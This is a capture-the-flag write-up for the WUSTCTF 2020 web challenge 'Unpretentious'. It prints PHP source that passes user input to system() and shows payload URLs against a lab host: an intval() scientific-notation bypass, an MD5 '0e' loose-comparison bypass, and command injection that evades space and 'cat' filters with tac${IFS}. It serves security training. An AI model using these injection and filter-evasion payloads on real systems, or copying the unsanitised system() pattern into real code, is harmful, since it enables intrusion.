[WUSTCTF 2020] Unpretentious
I can't see anything on it, and I can't catch it with burp packet capture. I scan it with dirsearch and find `robots.txt.
visit
Then go visit /fAke_f1agggg.phpand you'll find out you've been cheated (Clam)
But if you grab a package, the result will be different. You can see the hint
Get source code
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
Let’s go through each level one by one. Let’s start with level 1.
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
A function is used here intval(), let us pass in a number, and it is less than 2020, but +1 is greater than 2021
About
intval()function bypass
int intval( var,base)Note:
If base is 0, the base used is determined by detecting the format of var:◦ If the string includes the prefix of "0x" (or "0X"), use hexadecimal (hex); otherwise,
◦ If the string starts with "0", use octal; otherwise,
◦ Decimal will be used.
Numbers after the decimal point will be rounded off directly.
When single quotes are used to pass values, they only recognize the part in front of letters. When we pass parameters via get, we actually add single quotes by default. It does not have to be e here, as long as it is a letter.
So we can construct the payload:
http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10
Next is level2:
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
md5 weak comparison
For $a==md5($a)this type of weak comparison, the array cannot be bypassed. Here we use the method to 0ebypass the weak comparison.
对于某些特殊的`字符串`加密后得到的密文以0e开头,PHP会当作科学计数法来处理,也就是0的n次方,得到的值比较的时候都相同
Construct payload:
http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017
Then get flag
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
Here you need to pass get_flagin the value to get the flag. First, ls to see where the flag is.
node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017&get_flag=ls
It’s quite long, and both spaces and cat are filtered out in the source code. There are many ways to bypass spaces. Pick one from the table. Cat can be replaced with tac to construct the payload:
http://node3.anna.nssctf.cn:28574/fl4g.php?num=2019e10&md5=0e215962017&get_flag=tac${IFS}flll*